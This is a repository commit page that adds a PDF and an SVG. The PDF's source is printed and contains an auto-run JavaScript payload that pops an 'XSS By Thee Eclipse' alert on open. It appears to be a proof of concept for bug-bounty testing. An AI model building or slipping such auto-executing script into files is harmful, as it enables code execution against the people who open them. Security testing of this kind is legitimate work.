datoto9019 commited on
Commit
e9548e2
·
verified ·
1 Parent(s): 6899936

Upload 2 files

Browse files

![mz.png](https://images.ctfassets.net/h0jtq0wdx190/3HivOdbWvD7QCDXEd53fx0/484ffd97340457cd7f1b954be06b5432/SVG_WEBPAGE_XSS.svg)

Files changed (2) hide show
  1. 1.pdf +62 -0
  2. cookiealert.svg +141 -0
1.pdf ADDED
@@ -0,0 +1,62 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ %PDF-1.3
2
+ %����
3
+ 1 0 obj
4
+ <</Pages 2 0 R /Type /Catalog>>
5
+ endobj
6
+ 2 0 obj
7
+ <</Count 1 /Kids [3 0 R] /Type /Pages>>
8
+ endobj
9
+ 3 0 obj
10
+ <</AA
11
+ <</O
12
+ <</JS
13
+ (
14
+ try {
15
+ app.alert\("XSS By Thee Eclipse"\);
16
+ } catch \(e\) {
17
+ app.alert\(e.message\);
18
+ }
19
+ )
20
+ /S /JavaScript
21
+ >>
22
+ >>
23
+ /Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
24
+ /Resources
25
+ <<
26
+ /Font <</F1 5 0 R>> % Font dictionary
27
+ >>
28
+ /Type /Page
29
+ >>
30
+ endobj
31
+ 4 0 obj
32
+ <</Length 300>> % Updated Length to accommodate the new text
33
+ stream
34
+
35
+ BT
36
+ /F1 18 Tf % Set font size to 18 for a smaller text
37
+ 0 0 0 rg % Set text color to black
38
+ 1 0 0 1 72 750 Tm % Adjusted X and Y-coordinates
39
+ (Hello! Hackerone theeeclipse Added XSS here) Tj
40
+ ET
41
+
42
+ endstream
43
+ endobj
44
+ 5 0 obj
45
+ <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>> % Use the standard Helvetica font
46
+ endobj
47
+ xref
48
+ 0 6
49
+ 0000000000 65535 f
50
+ 0000000015 00000 n
51
+ 0000000062 00000 n
52
+ 0000000117 00000 n
53
+ 0000000210 00000 n
54
+ 0000000524 00000 n
55
+ trailer
56
+ <<
57
+ /Root 1 0 R
58
+ /Size 6
59
+ >>
60
+ startxref
61
+ 518
62
+ %%EOF
cookiealert.svg ADDED